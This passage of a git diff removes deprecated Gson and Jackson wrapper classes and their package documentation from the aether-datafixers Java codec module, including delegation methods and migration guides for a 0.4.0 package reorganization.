- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in all
- * copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- * SOFTWARE.
- */
-
-/**
- * DEPRECATED: Legacy package for Gson-based {@link de.splatgames.aether.datafixers.api.dynamic.DynamicOps}
- * implementation. This package is retained only for backwards compatibility and will be removed in version 1.0.0.
- *
- *
This package contains the original {@link de.splatgames.aether.datafixers.codec.gson.GsonOps} class
- * from the pre-0.4.0 package structure. All classes in this package are deprecated and delegate to their
- * replacements in the reorganized {@link de.splatgames.aether.datafixers.codec.json.gson} package.
- *
- *
Migration Guide
- *
To migrate from this deprecated package to the new package structure:
- *
- *
Import Changes
- *
{@code
- * // Old import (deprecated, will be removed in 1.0.0)
- * import de.splatgames.aether.datafixers.codec.gson.GsonOps;
- *
- * // New import (recommended)
- * import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
- * }
- *
- *
Code Changes
- *
No code changes are required beyond updating imports. The API is identical:
- *
{@code
- * // This code works with both old and new imports
- * GsonOps ops = GsonOps.INSTANCE;
- * Dynamic dynamic = new Dynamic<>(ops, jsonElement);
- * }
- *
- *
Deprecation Timeline
- *
- *
Deprecation and Removal Schedule
- *
Version
Status
Action Required
- *
0.4.0
Deprecated
Update imports to new package; old code continues to work
- *
0.5.0
Deprecated
Warnings during compilation; functionality unchanged
- *
1.0.0
Removed
Package deleted; migration required before upgrade
- *
- *
- *
Why This Change?
- *
The package reorganization in version 0.4.0 introduced a cleaner, more scalable structure:
- *
- *
Format-Based Organization: All JSON implementations are now grouped under
- * {@code codec.json.*}, YAML under {@code codec.yaml.*}, etc.
- *
Library-Based Subpackages: Each format has subpackages for different
- * libraries (e.g., {@code json.gson}, {@code json.jackson})
- *
Consistent Naming: The new structure makes it easier to find and choose
- * the right implementation for your needs
The deprecated {@link de.splatgames.aether.datafixers.codec.gson.GsonOps} class uses the
- * delegation pattern to forward all method calls to the new
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} implementation. This ensures:
- *
- *
Identical behavior between deprecated and new implementations
- *
Bug fixes applied to the new implementation automatically benefit deprecated users
- *
No performance overhead beyond a single method delegation
- *
- *
- *
Thread Safety
- *
All classes in this deprecated package maintain the same thread-safety guarantees as their
- * replacements. The singleton {@link de.splatgames.aether.datafixers.codec.gson.GsonOps#INSTANCE}
- * can be safely shared across multiple threads.
- *
- * @author Erik Pförtner
- * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
- * @see de.splatgames.aether.datafixers.codec.json
- * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use classes from {@link de.splatgames.aether.datafixers.codec.json.gson}
- * instead. This package will be removed in version 1.0.0.
- */
-@Deprecated(since = "0.4.0", forRemoval = true)
-package de.splatgames.aether.datafixers.codec.gson;
diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java
deleted file mode 100644
index 886fdaf..0000000
--- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java
+++ /dev/null
@@ -1,767 +0,0 @@
-/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in all
- * copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- * SOFTWARE.
- */
-
-package de.splatgames.aether.datafixers.codec.jackson;
-
-import com.fasterxml.jackson.databind.JsonNode;
-import com.fasterxml.jackson.databind.ObjectMapper;
-import com.fasterxml.jackson.databind.node.ArrayNode;
-import com.fasterxml.jackson.databind.node.NullNode;
-import com.fasterxml.jackson.databind.node.ObjectNode;
-import com.google.common.base.Preconditions;
-import de.splatgames.aether.datafixers.api.dynamic.DynamicOps;
-import de.splatgames.aether.datafixers.api.result.DataResult;
-import de.splatgames.aether.datafixers.api.util.Pair;
-import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
-import org.jetbrains.annotations.NotNull;
-import org.jetbrains.annotations.Nullable;
-
-import java.util.stream.Stream;
-
-/**
- * Backwards-compatibility wrapper for {@link JacksonJsonOps}.
- *
- *
This class provides API compatibility for code written against the pre-0.4.0 package structure.
- * It delegates all operations to the new {@link JacksonJsonOps} implementation in the reorganized
- * package hierarchy.
- *
- *
Migration Guide
- *
To migrate to the new API, update your imports and class references:
This class is scheduled for removal in version 1.0.0. All functionality remains
- * fully operational until removal, but users should migrate to the new package structure
- * and class name at their earliest convenience.
- *
- *
Delegation Pattern
- *
This wrapper implements the delegation pattern, forwarding all method calls to the
- * underlying {@link JacksonJsonOps} instance. This ensures identical behavior between
- * the deprecated and new implementations.
- *
- *
Thread Safety
- *
This class is thread-safe. The singleton {@link #INSTANCE} can be safely shared
- * across multiple threads, as the underlying implementation is also thread-safe.
- * Custom instances created with a custom {@link ObjectMapper} are thread-safe if
- * the provided mapper is thread-safe.
- *
- * @author Erik Pförtner
- * @see JacksonJsonOps
- * @see DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use {@link JacksonJsonOps} from the {@code codec.json.jackson}
- * package instead. This class will be removed in version 1.0.0 as part of
- * the package reorganization.
- */
-@Deprecated(forRemoval = true, since = "0.4.0")
-public class JacksonOps implements DynamicOps {
-
- /**
- * The singleton instance of the deprecated {@code JacksonOps} wrapper.
- *
- *
This instance wraps {@link JacksonJsonOps#INSTANCE} and provides full backwards
- * compatibility. It uses a default {@link ObjectMapper} with standard configuration.
- * The instance is thread-safe and can be shared across the entire application.
- *
- * @deprecated Use {@link JacksonJsonOps#INSTANCE} instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- public static final JacksonOps INSTANCE = new JacksonOps(JacksonJsonOps.INSTANCE);
-
- /**
- * The underlying {@link JacksonJsonOps} instance to which all operations are delegated.
- *
- *
This field holds the actual implementation that performs all DynamicOps operations.
- * The wrapper simply forwards all method calls to this instance, ensuring behavioral
- * equivalence between the deprecated and new implementations.
- */
- private final JacksonJsonOps baseOps;
-
- /**
- * Creates a new deprecated {@code JacksonOps} wrapper delegating to the specified base implementation.
- *
- *
This constructor allows wrapping any {@link JacksonJsonOps} instance, enabling use
- * of custom configurations while maintaining backwards compatibility.
- *
- *
Usage
- *
{@code
- * // Typically use the singleton instead
- * JacksonOps ops = JacksonOps.INSTANCE;
- *
- * // Or wrap a custom JacksonJsonOps instance
- * JacksonJsonOps customJsonOps = new JacksonJsonOps(customMapper);
- * JacksonOps customOps = new JacksonOps(customJsonOps);
- * }
- *
- * @param baseOps the base {@link JacksonJsonOps} instance to delegate all operations to;
- * must not be {@code null}
- * @deprecated Use {@link JacksonJsonOps} directly instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- private JacksonOps(@NotNull final JacksonJsonOps baseOps) {
- Preconditions.checkNotNull(baseOps, "baseOps must not be null");
- this.baseOps = baseOps;
- }
-
- /**
- * Creates a new deprecated {@code JacksonOps} with the specified {@link ObjectMapper}.
- *
- *
This constructor provides backwards compatibility for code that creates custom
- * {@code JacksonOps} instances with a specific mapper configuration.
- *
- *
Usage
- *
{@code
- * // Old usage (deprecated)
- * ObjectMapper customMapper = new ObjectMapper()
- * .configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, false);
- * JacksonOps customOps = new JacksonOps(customMapper);
- *
- * // New usage (recommended)
- * JacksonJsonOps customOps = new JacksonJsonOps(customMapper);
- * }
- *
- * @param mapper the {@link ObjectMapper} to use for JSON operations; must not be {@code null}
- * @deprecated Use {@link JacksonJsonOps#JacksonJsonOps(ObjectMapper)} instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- public JacksonOps(@NotNull final ObjectMapper mapper) {
- Preconditions.checkNotNull(mapper, "mapper must not be null");
- this.baseOps = new JacksonJsonOps(mapper);
- }
-
- /**
- * Returns the {@link ObjectMapper} used by this instance.
- *
- *
This method provides access to the underlying Jackson mapper, which can be
- * useful for advanced configuration or direct JSON serialization/deserialization.
- *
- * @return the {@link ObjectMapper} used by the underlying {@link JacksonJsonOps} instance
- * @deprecated Use {@link JacksonJsonOps#mapper()} instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- public ObjectMapper mapper() {
- return this.baseOps.mapper();
- }
-
- // ==================== Empty/Null Values ====================
-
- /**
- * {@inheritDoc}
- *
- *
Returns the canonical empty/null representation for Jackson JSON data,
- * which is {@link NullNode#getInstance()}. This delegates to the underlying
- * {@link JacksonJsonOps#empty()} method.
- *
- * @return {@link NullNode#getInstance()} representing the absence of a value
- */
- @NotNull
- @Override
- public JsonNode empty() {
- return this.baseOps.empty();
- }
-
- /**
- * {@inheritDoc}
- *
- *
Returns an empty JSON object ({@code {}}). This delegates to the underlying
- * {@link JacksonJsonOps#emptyMap()} method.
Checks whether the given JSON node is a map/object structure.
- * This delegates to the underlying {@link JacksonJsonOps#isMap(JsonNode)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @return {@code true} if the value is an {@link ObjectNode}, {@code false} otherwise
- */
- @Override
- public boolean isMap(@NotNull final JsonNode value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isMap(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON node is a list/array structure.
- * This delegates to the underlying {@link JacksonJsonOps#isList(JsonNode)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @return {@code true} if the value is an {@link ArrayNode}, {@code false} otherwise
- */
- @Override
- public boolean isList(@NotNull final JsonNode value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isList(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON node is a text/string node.
- * This delegates to the underlying {@link JacksonJsonOps#isString(JsonNode)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @return {@code true} if the value is a text node, {@code false} otherwise
- */
- @Override
- public boolean isString(@NotNull final JsonNode value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isString(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON node is a numeric node.
- * This delegates to the underlying {@link JacksonJsonOps#isNumber(JsonNode)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @return {@code true} if the value is a numeric node, {@code false} otherwise
- */
- @Override
- public boolean isNumber(@NotNull final JsonNode value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isNumber(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON node is a boolean node.
- * This delegates to the underlying {@link JacksonJsonOps#isBoolean(JsonNode)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @return {@code true} if the value is a boolean node, {@code false} otherwise
- */
- @Override
- public boolean isBoolean(@NotNull final JsonNode value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isBoolean(value);
- }
-
- // ==================== Primitive Creation ====================
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON text node from the given string value.
- * This delegates to the underlying {@link JacksonJsonOps#createString(String)} method.
- *
- * @param value the string value to wrap; must not be {@code null}
- * @return a new text node containing the string
- */
- @NotNull
- @Override
- public JsonNode createString(@NotNull final String value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.createString(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given integer value.
- * This delegates to the underlying {@link JacksonJsonOps#createInt(int)} method.
- *
- * @param value the integer value to wrap
- * @return a new int node containing the integer
- */
- @NotNull
- @Override
- public JsonNode createInt(final int value) {
- return this.baseOps.createInt(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given long value.
- * This delegates to the underlying {@link JacksonJsonOps#createLong(long)} method.
- *
- * @param value the long value to wrap
- * @return a new long node containing the long
- */
- @NotNull
- @Override
- public JsonNode createLong(final long value) {
- return this.baseOps.createLong(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given float value.
- * This delegates to the underlying {@link JacksonJsonOps#createFloat(float)} method.
- *
- * @param value the float value to wrap
- * @return a new float node containing the float
- */
- @NotNull
- @Override
- public JsonNode createFloat(final float value) {
- return this.baseOps.createFloat(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given double value.
- * This delegates to the underlying {@link JacksonJsonOps#createDouble(double)} method.
- *
- * @param value the double value to wrap
- * @return a new double node containing the double
- */
- @NotNull
- @Override
- public JsonNode createDouble(final double value) {
- return this.baseOps.createDouble(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given byte value.
- * Since JSON has no distinct byte type, the value is stored as a short node.
- * This delegates to the underlying {@link JacksonJsonOps#createByte(byte)} method.
- *
- * @param value the byte value to wrap
- * @return a new short node containing the byte value
- */
- @NotNull
- @Override
- public JsonNode createByte(final byte value) {
- return this.baseOps.createByte(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given short value.
- * This delegates to the underlying {@link JacksonJsonOps#createShort(short)} method.
- *
- * @param value the short value to wrap
- * @return a new short node containing the short
- */
- @NotNull
- @Override
- public JsonNode createShort(final short value) {
- return this.baseOps.createShort(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON boolean node from the given boolean value.
- * This delegates to the underlying {@link JacksonJsonOps#createBoolean(boolean)} method.
- *
- * @param value the boolean value to wrap
- * @return a new boolean node containing the boolean
- */
- @NotNull
- @Override
- public JsonNode createBoolean(final boolean value) {
- return this.baseOps.createBoolean(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given {@link Number} value.
- * The specific numeric type is preserved in the underlying JSON representation.
- * This delegates to the underlying {@link JacksonJsonOps#createNumeric(Number)} method.
- *
- * @param value the number value to wrap; must not be {@code null}
- * @return a new numeric node containing the number
- */
- @NotNull
- @Override
- public JsonNode createNumeric(@NotNull final Number value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.createNumeric(value);
- }
-
- // ==================== Primitive Reading ====================
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the string value from a JSON node. The node must be a text node.
- * This delegates to the underlying {@link JacksonJsonOps#getStringValue(JsonNode)} method.
- *
- * @param input the JSON node to extract the string from; must not be {@code null}
- * @return a {@link DataResult} containing the string value on success,
- * or an error if the node is not a text node
- */
- @NotNull
- @Override
- public DataResult getStringValue(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getStringValue(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the numeric value from a JSON node. The node must be a numeric node.
- * This delegates to the underlying {@link JacksonJsonOps#getNumberValue(JsonNode)} method.
- *
- * @param input the JSON node to extract the number from; must not be {@code null}
- * @return a {@link DataResult} containing the {@link Number} value on success,
- * or an error if the node is not a numeric node
- */
- @NotNull
- @Override
- public DataResult getNumberValue(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getNumberValue(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the boolean value from a JSON node. The node must be a boolean node.
- * This delegates to the underlying {@link JacksonJsonOps#getBooleanValue(JsonNode)} method.
- *
- * @param input the JSON node to extract the boolean from; must not be {@code null}
- * @return a {@link DataResult} containing the boolean value on success,
- * or an error if the node is not a boolean node
- */
- @NotNull
- @Override
- public DataResult getBooleanValue(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getBooleanValue(input);
- }
-
- // ==================== List Operations ====================
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON array node from a stream of JSON nodes.
- * This delegates to the underlying {@link JacksonJsonOps#createList(Stream)} method.
- *
- * @param values the stream of JSON nodes to include in the array; must not be {@code null}
- * @return a new {@link ArrayNode} containing all elements from the stream
- */
- @NotNull
- @Override
- public JsonNode createList(@NotNull final Stream values) {
- Preconditions.checkNotNull(values, "values must not be null");
- return this.baseOps.createList(values);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the elements of a JSON array as a stream. The input must be an
- * {@link ArrayNode}. This delegates to the underlying
- * {@link JacksonJsonOps#getList(JsonNode)} method.
- *
- * @param input the JSON node to extract list elements from; must not be {@code null}
- * @return a {@link DataResult} containing a stream of the array elements on success,
- * or an error if the input is not an array node
- */
- @NotNull
- @Override
- public DataResult> getList(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getList(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON array by appending a value to an existing array.
- * The original array is not modified; a deep copy is created.
- * This delegates to the underlying
- * {@link JacksonJsonOps#mergeToList(JsonNode, JsonNode)} method.
- *
- * @param list the existing JSON array to append to; must not be {@code null}
- * @param value the JSON node to append; must not be {@code null}
- * @return a {@link DataResult} containing the new array with the appended value on success,
- * or an error if the list is not an array node
- */
- @NotNull
- @Override
- public DataResult mergeToList(@NotNull final JsonNode list, @NotNull final JsonNode value) {
- Preconditions.checkNotNull(list, "list must not be null");
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.mergeToList(list, value);
- }
-
- // ==================== Map Operations ====================
-
- /**
- * {@inheritDoc}
- *
- *
Retrieves the value associated with a key from a JSON object.
- * This delegates to the underlying {@link JacksonJsonOps#get(JsonNode, String)} method.
- *
- * @param value the JSON object to retrieve from; must not be {@code null}
- * @param key the key to look up; must not be {@code null}
- * @return the JSON node associated with the key, or {@code null} if not present
- * or if the input is not an object node
- */
- @Override
- public @Nullable JsonNode get(@NotNull final JsonNode value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.get(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object with a field set to the specified value.
- * If the input is an object node, a deep copy is created with the field updated.
- * If the input is not an object node, a new object is created containing only the specified field.
- * This delegates to the underlying
- * {@link JacksonJsonOps#set(JsonNode, String, JsonNode)} method.
- *
- * @param value the JSON node to modify; must not be {@code null}
- * @param key the key for the field to set; must not be {@code null}
- * @param newValue the value to associate with the key; must not be {@code null}
- * @return a new {@link ObjectNode} with the field set to the specified value
- */
- @NotNull
- @Override
- public JsonNode set(@NotNull final JsonNode value, @NotNull final String key, @NotNull final JsonNode newValue) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.set(value, key, newValue);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object with a field removed.
- * A deep copy of the input object is created without the specified field.
- * This delegates to the underlying
- * {@link JacksonJsonOps#remove(JsonNode, String)} method.
- *
- * @param value the JSON object to modify; must not be {@code null}
- * @param key the key of the field to remove; must not be {@code null}
- * @return a new {@link ObjectNode} without the specified field
- */
- @NotNull
- @Override
- public JsonNode remove(@NotNull final JsonNode value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.remove(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether a JSON object contains a field with the specified key.
- * This delegates to the underlying
- * {@link JacksonJsonOps#has(JsonNode, String)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @param key the key to look for; must not be {@code null}
- * @return {@code true} if the value is an {@link ObjectNode} and contains the specified key,
- * {@code false} otherwise
- */
- @Override
- public boolean has(@NotNull final JsonNode value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.has(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON object from a stream of key-value pairs.
- * Keys must be text nodes; non-text keys are skipped.
- * This delegates to the underlying {@link JacksonJsonOps#createMap(Stream)} method.
- *
- * @param entries the stream of key-value pairs; must not be {@code null}
- * @return a new {@link ObjectNode} containing all valid entries from the stream
- */
- @NotNull
- @Override
- public JsonNode createMap(@NotNull final Stream> entries) {
- Preconditions.checkNotNull(entries, "entries must not be null");
- return this.baseOps.createMap(entries);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the entries of a JSON object as a stream of key-value pairs.
- * This delegates to the underlying
- * {@link JacksonJsonOps#getMapEntries(JsonNode)} method.
- *
- * @param input the JSON node to extract entries from; must not be {@code null}
- * @return a {@link DataResult} containing a stream of key-value pairs on success,
- * or an error if the input is not an object node
- */
- @NotNull
- @Override
- public DataResult>> getMapEntries(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getMapEntries(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object by adding a key-value pair to an existing map.
- * A deep copy of the input map is created with the new entry added.
- * This delegates to the underlying
- * {@link JacksonJsonOps#mergeToMap(JsonNode, JsonNode, JsonNode)} method.
- *
- * @param map the existing JSON object; must not be {@code null}
- * @param key the key for the new entry (must be a text node); must not be {@code null}
- * @param value the value for the new entry; must not be {@code null}
- * @return a {@link DataResult} containing the new object with the added entry on success,
- * or an error if the map is not an object node or the key is not a text node
- */
- @NotNull
- @Override
- public DataResult mergeToMap(@NotNull final JsonNode map, @NotNull final JsonNode key, @NotNull final JsonNode value) {
- Preconditions.checkNotNull(map, "map must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.mergeToMap(map, key, value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object by merging two maps together.
- * A deep copy of the first map is created, and all entries from the second map are added.
- * Entries in the second map override entries with the same key in the first map.
- * This delegates to the underlying
- * {@link JacksonJsonOps#mergeToMap(JsonNode, JsonNode)} method.
- *
- * @param map the base JSON object; must not be {@code null}
- * @param other the JSON object to merge from; must not be {@code null}
- * @return a {@link DataResult} containing the merged object on success,
- * or an error if either argument is not an object node
- */
- @NotNull
- @Override
- public DataResult mergeToMap(@NotNull final JsonNode map, @NotNull final JsonNode other) {
- Preconditions.checkNotNull(map, "map must not be null");
- Preconditions.checkNotNull(other, "other must not be null");
- return this.baseOps.mergeToMap(map, other);
- }
-
- // ==================== Conversion ====================
-
- /**
- * {@inheritDoc}
- *
- *
Converts data from another {@link DynamicOps} format to Jackson's {@link JsonNode}.
- * Recursively converts primitives, lists, and maps to their Jackson equivalents.
- * This delegates to the underlying
- * {@link JacksonJsonOps#convertTo(DynamicOps, Object)} method.
- *
- * @param the type parameter of the target format
- * @param ops the target {@link DynamicOps} implementation; must not be {@code null}
- * @param input the data to convert in the source format; must not be {@code null}
- * @return the converted data as a Jackson {@link JsonNode}
- */
- @NotNull
- @Override
- public JsonNode convertTo(@NotNull final DynamicOps ops, @NotNull final U input) {
- Preconditions.checkNotNull(ops, "ops must not be null");
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.convertTo(ops, input);
- }
-
- /**
- * Returns a string representation of this deprecated wrapper.
- *
- *
The returned string clearly indicates that this is a deprecated wrapper
- * class and suggests using the new implementation instead.
- *
- * @return a descriptive string indicating deprecated status and the recommended alternative
- */
- @Override
- public String toString() {
- return "JacksonOps (deprecated, use JacksonJsonOps)";
- }
-}
diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java
deleted file mode 100644
index 73a5b8f..0000000
--- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java
+++ /dev/null
@@ -1,135 +0,0 @@
-/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in all
- * copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- * SOFTWARE.
- */
-
-/**
- * DEPRECATED: Legacy package for Jackson-based {@link de.splatgames.aether.datafixers.api.dynamic.DynamicOps}
- * implementation. This package is retained only for backwards compatibility and will be removed in version 1.0.0.
- *
- *
This package contains the original {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps} class
- * from the pre-0.4.0 package structure. All classes in this package are deprecated and delegate to their
- * replacements in the reorganized {@link de.splatgames.aether.datafixers.codec.json.jackson} package.
- *
- *
Migration Guide
- *
To migrate from this deprecated package to the new package structure:
- *
- *
Import Changes
- *
{@code
- * // Old imports (deprecated, will be removed in 1.0.0)
- * import de.splatgames.aether.datafixers.codec.jackson.JacksonOps;
- *
- * // New imports (recommended)
- * import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
- * }
- *
- *
Code Changes
- *
The class has been renamed from {@code JacksonOps} to {@code JacksonJsonOps} for clarity:
- *
{@code
- * // Old code (deprecated)
- * JacksonOps ops = JacksonOps.INSTANCE;
- * JacksonOps customOps = new JacksonOps(customMapper);
- * Dynamic dynamic = new Dynamic<>(ops, jsonNode);
- *
- * // New code (recommended)
- * JacksonJsonOps ops = JacksonJsonOps.INSTANCE;
- * JacksonJsonOps customOps = new JacksonJsonOps(customMapper);
- * Dynamic dynamic = new Dynamic<>(ops, jsonNode);
- * }
- *
- *
Deprecation Timeline
- *
- *
Deprecation and Removal Schedule
- *
Version
Status
Action Required
- *
0.4.0
Deprecated
Update imports and class names; old code continues to work
- *
0.5.0
Deprecated
Warnings during compilation; functionality unchanged
- *
1.0.0
Removed
Package deleted; migration required before upgrade
- *
- *
- *
Why This Change?
- *
The package reorganization in version 0.4.0 introduced a cleaner, more scalable structure:
- *
- *
Format-Based Organization: All JSON implementations are now grouped under
- * {@code codec.json.*}, YAML under {@code codec.yaml.*}, etc.
- *
Library-Based Subpackages: Each format has subpackages for different
- * libraries (e.g., {@code json.gson}, {@code json.jackson})
- *
Disambiguated Naming: {@code JacksonOps} is now {@code JacksonJsonOps} to
- * distinguish it from {@code JacksonYamlOps}, {@code JacksonTomlOps}, and {@code JacksonXmlOps}
The deprecated {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps} class uses the
- * delegation pattern to forward all method calls to the new
- * {@link de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps} implementation. This ensures:
- *
- *
Identical behavior between deprecated and new implementations
- *
Bug fixes applied to the new implementation automatically benefit deprecated users
- *
No performance overhead beyond a single method delegation
- *
- *
- *
Thread Safety
- *
All classes in this deprecated package maintain the same thread-safety guarantees as their
- * replacements. The singleton {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps#INSTANCE}
- * can be safely shared across multiple threads. Custom instances created with a custom
- * {@link com.fasterxml.jackson.databind.ObjectMapper} are thread-safe if the provided mapper is thread-safe.
- *
- * @author Erik Pförtner
- * @see de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps
- * @see de.splatgames.aether.datafixers.codec.json
- * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use classes from {@link de.splatgames.aether.datafixers.codec.json.jackson}
- * instead. This package will be removed in version 1.0.0.
- */
